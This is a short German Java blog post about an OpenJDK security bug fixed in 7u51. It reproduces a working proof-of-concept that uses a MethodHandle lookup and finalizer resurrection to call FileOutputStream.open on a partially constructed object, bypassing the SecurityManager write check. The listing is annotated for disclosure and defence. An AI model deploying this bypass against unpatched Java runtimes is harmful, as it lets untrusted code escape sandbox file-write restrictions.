Java Blog

Interessanter Sicherheits-Bug in 7u51 gefixt

Details unter http://weblog.ikvm.net/2014/01/16/PubliclyReportedOpenJDKVulnerabilityFixedIn7u51.aspx:

import java.lang.invoke.*;
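/**
 * Demonstration listing for the OpenJDK issue that the post reports as fixed in 7u51.
 *
 * <p>The listing combines two ingredients:
 * <ol>
 *   <li>a {@link MethodHandles.Lookup#findVirtual} call made from a subclass for
 *       {@code open(String, boolean)}, a method this class does not declare, so it has to be
 *       resolved in the superclass {@link java.io.FileOutputStream};</li>
 *   <li>a finalizer that stores {@code this} in a static field, which keeps an instance
 *       reachable even though its constructor threw.</li>
 * </ol>
 * The handle is then invoked on that partially constructed instance, i.e. without the
 * superclass constructor having completed. {@code FileOutputStream(String)} is documented to
 * call {@code SecurityManager.checkWrite} when a security manager is installed, so that check
 * is what the sequence sidesteps.
 *
 * <p>For defenders: run 7u51 or later, where the lookup is expected to be rejected
 * (NOTE(review): exact exception type not shown on the page, confirm against the linked
 * write-up). Independently of this bug, non-final classes that perform checks in their
 * constructors should guard against use of partially initialized instances, because a
 * subclass finalizer can resurrect them as shown in {@link #finalize()}.
 *
 * <p>The string literals were printed with typographic quotes in the blog rendering; they are
 * restored to plain ASCII quotes here so the listing is valid Java again.
 */
class test extends java.io.FileOutputStream {
  /** Holds the instance resurrected by {@link #finalize()}; null until the finalizer ran. */
  static test t;

  /**
   * Calls the superclass constructor with an empty file name, which is expected to fail, so
   * the instance never finishes construction.
   */
  test() throws Exception {
    super("");
  }

  /**
   * Publishes the partially constructed instance through the static field {@link #t}.
   * This is the "finalizer resurrection" step.
   */
  @Override
  protected void finalize() {
    t = this;
  }

  public static void main(String[] args) throws Throwable {
    // Lookup is performed with this class as the reference class; the method itself lives in
    // the superclass. A fixed runtime should refuse this lookup.
    MethodHandle mh = MethodHandles.lookup().findVirtual(test.class, "open",
                        MethodType.methodType(void.class, String.class, boolean.class));
    System.out.println(mh);
    try {
      new test();
    } catch (Exception ignored) {
      // Expected: the constructor fails; only the finalizer side effect matters here.
      // (Renamed from `_`, which is not a legal identifier on newer Java versions.)
    }
    // Ask the runtime to run the pending finalizer so that `t` gets assigned. Neither call is
    // guaranteed to finalize the object; if it did not happen, `t` is still null below.
    System.gc();
    System.runFinalization();
    mh.invokeExact(t, "oops.txt", false);
  }
}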